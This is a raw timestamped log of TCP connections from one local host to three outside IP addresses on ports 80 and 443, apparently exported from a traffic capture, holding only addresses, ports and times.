                                                                                                                      Nov 21, 2024 12:20:21.603985071 CET49756443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:21.604017973 CET44349756188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:21.655388117 CET4974980192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:21.680197001 CET44349751188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:21.681899071 CET49751443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:21.681981087 CET44349751188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.137804985 CET44349751188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.137872934 CET44349751188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.137947083 CET49751443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:22.138534069 CET49751443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:22.142821074 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:22.144041061 CET4975780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:22.262939930 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.263012886 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:22.263629913 CET8049757193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.263715982 CET4975780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:22.263870001 CET4975780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:22.383282900 CET8049757193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.911690950 CET44349756188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:22.914627075 CET49756443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:22.914649010 CET44349756188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.376188993 CET44349756188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.376351118 CET44349756188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.376439095 CET49756443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:23.376818895 CET49756443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:23.383860111 CET4976380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:23.503413916 CET8049763193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.503545046 CET4976380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:23.503763914 CET4976380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:23.575783014 CET8049757193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.577660084 CET49764443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:23.577692986 CET44349764188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.577760935 CET49764443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:23.578181982 CET49764443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:23.578197956 CET44349764188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.623296976 CET8049763193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:23.624113083 CET4975780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:24.868138075 CET8049763193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:24.869455099 CET49767443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:24.869520903 CET44349767188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:24.869646072 CET49767443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:24.869919062 CET49767443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:24.869950056 CET44349767188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:24.881969929 CET44349764188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:24.883905888 CET49764443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:24.883949041 CET44349764188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:24.920995951 CET4976380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:25.348499060 CET44349764188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:25.348582029 CET44349764188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:25.348701954 CET49764443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:25.349097013 CET49764443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:25.353625059 CET4977380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:25.473109007 CET8049773193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:25.473195076 CET4977380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:25.473340034 CET4977380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:25.592745066 CET8049773193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.173074961 CET44349767188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.175149918 CET49767443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:26.175194025 CET44349767188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.637793064 CET44349767188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.637865067 CET44349767188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.638124943 CET49767443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:26.638736963 CET49767443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:26.644541025 CET4976380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:26.645740986 CET4977480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:26.764964104 CET8049763193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.765093088 CET4976380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:26.765561104 CET8049774193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.765681028 CET4977480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:26.765824080 CET4977480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:26.785577059 CET8049773193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.786720991 CET49775443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:26.786761045 CET44349775188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.786844969 CET49775443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:26.787163019 CET49775443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:26.787177086 CET44349775188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:26.827264071 CET4977380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:26.885962009 CET8049774193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.048743963 CET44349775188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.060342073 CET49775443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:28.060363054 CET44349775188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.079519033 CET8049774193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.080919981 CET49781443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:28.081007004 CET44349781188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.081149101 CET49781443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:28.081408024 CET49781443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:28.081424952 CET44349781188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.124278069 CET4977480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:28.506900072 CET44349775188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.506968975 CET44349775188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.507033110 CET49775443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:28.507550001 CET49775443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:28.510942936 CET4977380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:28.512090921 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:28.630884886 CET8049773193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.631045103 CET4977380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:28.631577015 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:28.631654978 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:28.631906986 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:28.751388073 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.349385023 CET44349781188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.351088047 CET49781443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:29.351181030 CET44349781188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.804963112 CET44349781188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.805032015 CET44349781188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.805140972 CET49781443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:29.805684090 CET49781443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:29.809246063 CET4977480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:29.810368061 CET4978880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:29.929081917 CET8049774193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.929198027 CET4977480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:29.929934025 CET8049788193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.930027008 CET4978880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:29.930200100 CET4978880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:29.944485903 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.945827007 CET49789443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:29.945863962 CET44349789188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.945983887 CET49789443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:29.946239948 CET49789443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:29.946257114 CET44349789188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:29.999131918 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:30.049616098 CET8049788193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.204444885 CET44349789188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.223344088 CET49789443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:31.223361015 CET44349789188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.662317991 CET44349789188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.662391901 CET44349789188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.662460089 CET49789443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:31.662933111 CET49789443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:31.666132927 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:31.667054892 CET4979080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:31.786014080 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.786075115 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:31.786604881 CET8049790193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:31.786684990 CET4979080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:31.786822081 CET4979080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:31.907022953 CET8049790193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:32.242924929 CET8049788193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:32.244446993 CET49796443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:32.244498968 CET44349796188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:32.244646072 CET49796443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:32.244914055 CET49796443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:32.244946957 CET44349796188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:32.296241045 CET4978880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:33.099962950 CET8049790193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.101521015 CET49797443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:33.101571083 CET44349797188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.101648092 CET49797443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:33.101979971 CET49797443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:33.101994038 CET44349797188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.139780998 CET4979080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:33.501154900 CET44349796188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.502758980 CET49796443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:33.502866030 CET44349796188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.954797029 CET44349796188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.954866886 CET44349796188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:33.954917908 CET49796443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:33.963746071 CET49796443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:34.031352997 CET4978880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.032624006 CET4979880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.151442051 CET8049788193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.151504040 CET4978880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.152839899 CET8049798193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.152923107 CET4979880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.153079033 CET4979880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.272499084 CET8049798193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.387063026 CET44349797188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.389481068 CET49797443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:34.389506102 CET44349797188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.843410969 CET44349797188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.843544006 CET44349797188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.843599081 CET49797443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:34.844504118 CET49797443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:34.848212957 CET4979080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.849580050 CET4980480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.968107939 CET8049790193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.968214035 CET4979080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.969074011 CET8049804193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:34.969175100 CET4980480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:34.969331980 CET4980480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:35.088911057 CET8049804193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:35.511667013 CET8049798193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:35.513026953 CET49805443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:35.513127089 CET44349805188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:35.513217926 CET49805443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:35.513483047 CET49805443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:35.513519049 CET44349805188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:35.561762094 CET4979880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:36.235622883 CET8049804193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:36.236864090 CET49806443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:36.236897945 CET44349806188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:36.236973047 CET49806443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:36.237256050 CET49806443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:36.237268925 CET44349806188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:36.280421972 CET4980480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:36.769639015 CET44349805188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:36.771716118 CET49805443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:36.771745920 CET44349805188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.226386070 CET44349805188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.226485014 CET44349805188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.226623058 CET49805443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:37.227082968 CET49805443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:37.230446100 CET4979880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:37.231698036 CET4981280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:37.350840092 CET8049798193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.350950003 CET4979880192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:37.351306915 CET8049812193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.351413965 CET4981280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:37.351619959 CET4981280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:37.471515894 CET8049812193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.495534897 CET44349806188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.497291088 CET49806443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:37.497337103 CET44349806188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.955615997 CET44349806188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.955703020 CET44349806188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:37.955799103 CET49806443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:37.956273079 CET49806443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:37.959647894 CET4980480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:37.960839987 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:38.080041885 CET8049804193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:38.080144882 CET4980480192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:38.080768108 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:38.080856085 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:38.081000090 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:38.200578928 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:38.664212942 CET8049812193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:38.666286945 CET49814443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:38.666327953 CET44349814188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:38.666436911 CET49814443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:38.666692972 CET49814443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:38.666709900 CET44349814188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:38.718044996 CET4981280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:39.397109032 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:39.398504019 CET49820443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:39.398551941 CET44349820188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:39.398633003 CET49820443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:39.398897886 CET49820443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:39.398916006 CET44349820188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:39.452352047 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:39.923865080 CET44349814188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:39.925700903 CET49814443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:39.925740004 CET44349814188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.381586075 CET44349814188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.381656885 CET44349814188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.381771088 CET49814443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:40.382234097 CET49814443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:40.397278070 CET4981280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:40.517172098 CET8049812193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.517328024 CET4981280192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:40.627599001 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:40.627649069 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.627720118 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:40.628180981 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:40.628197908 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.657130003 CET44349820188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.659044981 CET49820443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:40.659073114 CET44349820188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:41.111274004 CET44349820188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:41.111392975 CET44349820188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:41.111443996 CET49820443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:41.111855030 CET49820443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:41.115151882 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:41.116132975 CET4982780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:41.234961987 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:41.235075951 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:41.235531092 CET8049827193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:41.235614061 CET4982780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:41.235826015 CET4982780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:41.355400085 CET8049827193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.039668083 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.039823055 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:42.041709900 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:42.041739941 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.042028904 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.043752909 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:42.091322899 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.501355886 CET8049827193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.502841949 CET49828443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:42.502922058 CET44349828188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.503021955 CET49828443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:42.503369093 CET49828443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:42.503403902 CET44349828188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.546000004 CET4982780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:42.552185059 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.552254915 CET44349821149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:42.552309036 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:42.557749033 CET49821443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:43.763618946 CET44349828188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:43.765973091 CET49828443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:43.766016006 CET44349828188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:44.227545023 CET44349828188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:44.227618933 CET44349828188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:44.227679014 CET49828443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:44.229742050 CET49828443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:44.256720066 CET4982780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:44.257936954 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:44.257973909 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:44.258039951 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:44.258568048 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:44.258586884 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:44.376524925 CET8049827193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:44.376630068 CET4982780192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:45.915817022 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:45.915893078 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:45.917879105 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:45.917908907 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:45.918159008 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:45.919850111 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:45.967333078 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:46.442492962 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:46.442590952 CET44349834149.154.167.220192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:46.442838907 CET49834443192.168.2.9149.154.167.220
